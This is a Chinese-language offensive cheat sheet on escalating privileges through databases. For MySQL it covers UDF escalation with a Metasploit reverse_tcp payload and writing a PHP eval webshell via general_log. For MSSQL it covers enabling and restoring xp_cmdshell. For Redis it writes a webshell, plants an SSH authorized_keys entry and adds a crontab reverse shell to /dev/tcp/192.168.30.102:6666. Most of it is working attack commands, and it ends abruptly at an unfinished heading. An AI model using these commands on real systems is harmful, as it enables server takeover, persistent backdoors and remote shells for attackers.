Mysql提权
UDF提权是利用MYSQL的自定义函数功能,将MYSQL账号转化为系统system权限
前提:
1.UDF提权条件
(1)Mysql版本大于5.1版本udf.dll文件必须放置于MYSQL安装目录下的lib\plugin文件夹下。
(2)Mysql版本小于5.1版本。udf.dll文件在Windows2003下放置于c:\windows\system32,在windows2000下放置于c:\winnt\system32。
(3)掌握的mysql数据库的账号有对mysql的insert和delete权限以创建和抛弃函数,一般以root账号为佳,具备`root账号所具备的权限的其它账号也可以。
(4)可以将udf.dll写入到相应目录的权限。
secure_file_priv为空
show global variables like 'secure%';
当 secure_file_priv 的值为 NULL ,表示限制 mysqld 不允许导入|导出,此时无法提权
当 secure_file_priv 的值为 /tmp/ ,表示限制 mysqld 的导入|导出只能发生在 /tmp/ 目录下,此时也无法提权
当 secure_file_priv 的值没有具体值时,表示不对 mysqld 的导入|导出做限制,此时可提权提权步骤:获取密码-开启外联-高版本创建目录-MSF导出dll
Mysql版本查询命令
SELECT @@version`、`SELECT version();Mysql写马
set global general_log = ON;开启日志
set global general_log_file = "C:/phpstudy_pro/WWW/shell.php"
select '<?php eval($_POST[shell]);?>'提权方法
select version();//获取数据库版本
select user();//获取数据库用户
select @@basedir ;//获取安装目录
show variables like '%plugins%'; //寻找mysql安装路径
GRANT ALL PRIVILEGES ON *.* TO '帐号'@'%' IDENTIFIED BY '密码' WITH GRANT OPTION; //开启外联利用MSF的exploit/multi/mysql/mysql_udf_payload导出udf dll文件
use exploit/multi/mysql/mysql_udf_payload
set payload windows/meterpreter/reverse_tcp
set password root
set rhosts 10.10.10.1 (这里更换了靶机)
run
create function sys_eval returns string soname "WqkerHcA.dll";//创建函数绑定dll使用方法:
select sys_eval("whoami");//调用函数进行命令执行MSSQL
1.使用xp_cmdshell进行提权
如果用户拥有管理员sa权限则可以用sp_configure重修开启它
启用xp_cmdshell
EXEC sp_configure 'show advanced options', 1
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;关闭
exec sp_configure 'show advanced options', 1;
reconfigure;
exec sp_configure 'xp_cmdshell', 0;
reconfigure;执行
EXEC master.dbo.xp_cmdshell '命令'
如果xp_cmdshell被删除了,可以上传xplog70.dll进行恢复
exec master.sys.sp_addextendedproc 'xp_cmdshell', 'C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll'Oracle- 普通用户&注入提升模式&DBA模式
1、普通用户模式:
前提是拥有一个普通的oracle连接账号,不需要DBA权限,可提权至DBA,并以oracle实例运行的权限执行操作系统命令。
2、DBA用户模式:(自动化工具演示)
拥有DBA账号密码,可以省去自己手动创建存储过程的繁琐步骤,一键执行测试。
3、注入提升模式:(Sqlmap测试演示)
拥有一个oracle注入点,可以通过注入点直接执行系统命令,此种模式没有实现回显
redis
1.利用redis写入webshell
前提条件
-
可以成功远程连接,并且未作登录验证
-
知道网站的绝对路径,并且具有写入权限
连接redisredis-cli -h 10.0.20.99
config set dir /opt/lampp/htdocs/temp
config set dbfilename redis.php
set x "\r\n\r\n<?php phpinfo();eval($_POST['shell']);?>"
2 写入SSH公钥
ssh-keygen -t rsa //生成RSA公私钥
(echo -e "\r\n";cat id_rsa.pub;echo -e "\r\n";) > 1.txt //将生成的公钥添加换行输出为1.txt
config set dir /root/.ssh //修改redis路径为ssh的公钥路径
config set dbfilename authorized_keys //修改文件名
cat /root/.ssh/1.txt | redis-cli -h 192.168.30.103 -x set x
ssh -i id_rsa [email protected] //写入公钥文件
ssh -i id_rsa [email protected] //成功登录靶机3.利用crontab反弹shell
redis写入定时计划
config set dir /var/spool/cron //修改redis路径为crontab的路径
config set dbfilename root //修改文件名,修改完记得save一下
set x "\r\n*/1 * * * * /bin/bash -i>& /dev/tcp/192.168.30.102/6666 0>&1\r\n"
//写入定时计划4.SSRF&Gopher&Redis
如果Redis在内网,无法直接访问,可以通过SSRF访问利用
gopher协议支持发出GET、POST请求:可以先获取get请求包和post请求包,再构成符合gopher协议的请求。
gopher协议格式
gopher://<host>:<port>/<gopher-path>_后接TCP数据流4.redis主从复制RCE